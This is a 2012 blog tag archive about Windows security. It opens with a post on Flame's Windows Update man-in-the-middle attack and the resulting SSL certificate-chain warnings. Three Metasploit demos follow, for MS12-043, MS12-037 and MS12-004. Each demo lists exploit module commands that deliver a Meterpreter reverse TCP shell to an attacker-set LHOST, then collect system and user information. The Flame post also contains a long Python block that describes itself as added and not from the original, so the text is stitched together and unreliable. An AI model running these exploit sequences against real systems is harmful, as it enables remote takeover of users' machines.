Tag Archives: Windows

update.microsoft.com SSL warnings due to certificate chain update

Flame malware, the buzz of June 2012, had an interesting replication method through the Microsoft Windows Update service. The SNACK (NBNS spoofing) and MUNCH (spoofing of proxy detection and Windows Update requests) Flame modules allowed man-in-the-middle (MITM) attacks that distributed forged Windows updates to the targets.

The URLs targeted by the MITM were:

download.windowsupdate.com
download.microsoft.com
update.microsoft.com
www.update.microsoft.com
v5.windowsupdate.microsoft.com
windowsupdate.microsoft.com
www.download.windowsupdate.com
v5stats.windowsupdate.microsoft.com

The problem was that components of Flame were signed using a forged certificate that the attackers were able to create by exploiting a weakness in Microsoft Terminal Services, which allowed users to sign code with Microsoft certificates.

Microsoft has issued a security advisory (MSA-2718704) and an update (KB-2718704) that removes the untrusted certificates.

But as of today, the “Microsoft Root Certificate Authority” root certificate and the “Microsoft Update Secure Server CA 1” intermediate certificate are no longer trusted by the majority of Internet browsers (Firefox, Chrome, Safari and Opera). The cause is that Microsoft has regenerated the Windows Update certificate chain. The chain of trust is broken (see Qualys SSL Labs and SSL Shopper SSL Checker) for www.update.microsoft.com and update.microsoft.com.

SSL certificates for the following domain names are also no longer trusted, because the chain of trust is broken:

www.update.microsoft.com
update.microsoft.com
v5.windowsupdate.microsoft.com
windowsupdate.microsoft.com

The SSL certificates associated with the following domain names are also no longer trusted, because they point to a host that does not correspond to the requested domain name (hosted on Akamai):

download.windowsupdate.com
download.microsoft.com
www.download.windowsupdate.com

With KB-2718704 installed on an up-to-date Windows XP SP3, only the “www.update.microsoft.com” domain can be considered trusted, and only if you use Internet Explorer.

But despite the installation of KB-2718704, the following domains are still invalid:

update.microsoft.com
v5.windowsupdate.microsoft.com
windowsupdate.microsoft.com
download.windowsupdate.com
download.microsoft.com
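The two failure modes above (a chain that no longer ends at a root the browser trusts, and a certificate whose names do not match the requested host) are exactly what a browser's chain validation reports. The following Python is an added example, not code from the original post or from Microsoft: it models that validation with the certificate names the post gives. The regenerated root's name (NEW_ROOT) and the CDN certificate names are placeholders, and the leaf listing only the www name is a constructed case, since the post does not show the actual certificates.

```python
"""Minimal model of browser chain validation for the Windows Update case.
Added example; certificate names marked PLACEHOLDER / constructed are not
from the post.  Assumes a chain is presented leaf-first."""
from dataclasses import dataclass

@dataclass(frozen=True)
class Cert:
    subject: str
    issuer: str
    names: tuple = ()  # DNS names the leaf is valid for (SAN / CN)

def hostname_matches(pattern: str, host: str) -> bool:
    """Case-insensitive DNS name match.  A leading '*' matches exactly one
    label: '*.example.com' matches 'a.example.com' but neither 'example.com'
    nor 'a.b.example.com' (the usual browser rule)."""
    pattern, host = pattern.lower(), host.lower()
    if not pattern.startswith("*."):
        return pattern == host
    suffix = pattern[1:]  # ".example.com"
    if not host.endswith(suffix):
        return False
    prefix = host[: -len(suffix)]
    return bool(prefix) and "." not in prefix

def verify(host, chain, trusted_roots, untrusted=frozenset()):
    """Walk leaf -> issuer -> ... and say why a browser would warn.
    Returns 'ok', 'hostname-mismatch', 'explicitly-untrusted',
    'untrusted-root' or 'broken-chain' (issuer neither presented nor trusted)."""
    by_subject = {c.subject: c for c in chain}
    leaf = chain[0]
    if not any(hostname_matches(n, host) for n in leaf.names):
        return "hostname-mismatch"
    cert, seen = leaf, set()
    while True:
        # KB-2718704 style: a cert moved to the Untrusted store fails the chain outright
        if cert.subject in untrusted or cert.issuer in untrusted:
            return "explicitly-untrusted"
        if cert.issuer in trusted_roots:
            return "ok"
        if cert.subject == cert.issuer:  # self-signed but not in the store
            return "untrusted-root"
        nxt = by_subject.get(cert.issuer)
        if nxt is None or cert.issuer in seen:
            return "broken-chain"
        seen.add(cert.subject)
        cert = nxt

OLD_ROOT = "Microsoft Root Certificate Authority"      # named in the post
INTERMEDIATE = "Microsoft Update Secure Server CA 1"   # named in the post
NEW_ROOT = "PLACEHOLDER regenerated Microsoft root"    # not named in the post

def demo():
    """Scenarios from the post: browsers that only know the old root, a
    Windows store that also has the regenerated root, and a download host
    served from a CDN under the CDN's own names."""
    update_chain = [
        # constructed: leaf valid only for the www name
        Cert("www.update.microsoft.com", INTERMEDIATE, names=("www.update.microsoft.com",)),
        Cert(INTERMEDIATE, NEW_ROOT),
    ]
    cdn_chain = [  # constructed names standing in for the CDN's certificate
        Cert("edge.cdn.example", "Example CDN CA", names=("*.cdn.example",)),
        Cert("Example CDN CA", "Example Root"),
    ]
    return {
        "browser_update": verify("www.update.microsoft.com", update_chain, {OLD_ROOT}),
        "windows_update": verify("www.update.microsoft.com", update_chain, {OLD_ROOT, NEW_ROOT}),
        "other_name": verify("update.microsoft.com", update_chain, {OLD_ROOT, NEW_ROOT}),
        "cdn_download": verify("download.microsoft.com", cdn_chain, {"Example Root"}),
    }

if __name__ == "__main__":
    for scenario, result in demo().items():
        print(f"{scenario}: {result}")
```

The model only walks issuer names; real validation also checks signatures, validity dates, key usage and revocation, so treat it as a way to reason about which store (browser versus Windows) produces which warning, not as a replacement for running the SSL Labs check against the live hosts.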

Below are screenshots of the different browsers and their error messages.

[Image gallery of browser SSL error screenshots not reproduced]

MS12-043 Microsoft XML Core Services Vulnerability Metasploit Demo

Timeline :

Vulnerability found exploited in the wild
Public release of the vulnerability on 2012-06-12
Metasploit PoC provided on 2012-06-15

PoC provided by :

sinn3r
juan vazquez

Reference(s) :

MSA-2719615
MS12-043
MS KB 2719615
CVE-2012-1889
OSVDB-82873

Affected version(s) :

Microsoft XML Core Services 3.0, 4.0, 5.0, and 6.0.

Tested on Windows XP Pro SP3 with :

Internet Explorer 6 (6.0.2900.5512.xpsp_sp3_gdr.11025-1629)

Description :

This module exploits a memory corruption flaw in Microsoft XML Core Services when trying to access an uninitialized Node with the getDefinition API, which may corrupt memory allowing remote code execution. At the moment, this module only targets Microsoft XML Core Services 3.0 via IE6 and IE7 over Windows XP SP3.

Commands :

use exploit/windows/browser/msxml_get_definition_code_exec
set SRVHOST 192.168.178.100
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid

MS12-037 Internet Explorer Same ID Vulnerability Metasploit Demo

Timeline :

Vulnerability found exploited in the wild
Public release of the vulnerability on 2012-06-12
Metasploit PoC provided on 2012-06-13

PoC provided by :

Dark Son
Qihoo 360 Security Center
Yichong Lin
Google Inc.
juan vazquez

Reference(s) :

MS12-037
CVE-2012-1875
OSVDB-82865
https://twitter.com/binjo/status/212795802974830592

Affected version(s) :

Internet Explorer 6
Internet Explorer 7
Internet Explorer 8
Internet Explorer 9

Tested on Windows XP Pro SP3 with :

Internet Explorer 8 (8.0.6001.18702) and msvcrt ROP

Description :

This module exploits a memory corruption flaw in Internet Explorer 8 when handling objects with the same ID property. At the moment this module targets IE8 over Windows XP SP3 through the heap massaging plus heap spray as exploited in the wild.

Commands :

use exploit/windows/browser/ms12_037_same_id
set SRVHOST 192.168.178.100
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid

MS12-004 Windows Media Remote Code Execution Metasploit Demo

Timeline :

Vulnerability discovered and reported to the vendor by Shane Garrett
Coordinated public release of the vulnerability on 2012-01-10
Vulnerability exploited in the wild
Metasploit PoC provided on 2012-01-27

PoC provided by :

Shane Garrett
juan vazquez
sinn3r

Reference(s) :

MS12-004
CVE-2012-0003
OSVDB-78210
Trend Micro Blog Post

Affected version(s) :

Windows XP SP3
Windows XP Media Center Edition 2005 SP3
Windows XP Professional x64 Edition SP2
Windows Server 2003 SP2
Windows Server 2003 x64 Edition SP2
Windows Vista SP2
Windows Vista x64 Edition SP2
Windows Server 2008 for 32-bit Systems SP2
Windows Server 2008 for x64-based Systems SP2
Windows 7 for 32-bit Systems and Windows 7 for 32-bit SP1
Windows 7 for x64-based Systems and Windows 7 for x64-based Systems SP1
Windows Server 2008 R2 for x64-based Systems and Windows Server 2008 R2 for x64-based SP1

Tested on Windows XP SP3 with :

winmm.dll 5.1.2600.5512

Description :

This module exploits a heap overflow vulnerability in the Windows Multimedia Library (winmm.dll). The vulnerability occurs when parsing specially crafted MIDI files. Remote code execution can be achieved by using Windows Media Player’s ActiveX control. Exploitation is done by supplying a specially crafted MIDI file with specific events, causing the offset calculation to be higher than what is available on the heap (0x400 bytes allocated by WINMM!winmmAlloc), and then allowing us to either “inc al” or “dec al” a byte. This can be used to corrupt an array (CImplAry) we set up, and force the browser to confuse types from tagVARIANT objects, which leads to remote code execution in the context of the user. At this time, for the IE 8 target, JRE (Java Runtime Environment) is required to bypass DEP (Data Execution Prevention). Note: based on our testing, the vulnerability does not seem to trigger when the victim machine is operated via rdesktop.

Commands :

use exploit/windows/browser/ms12_004_midi
set SRVHOST 192.168.178.100
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid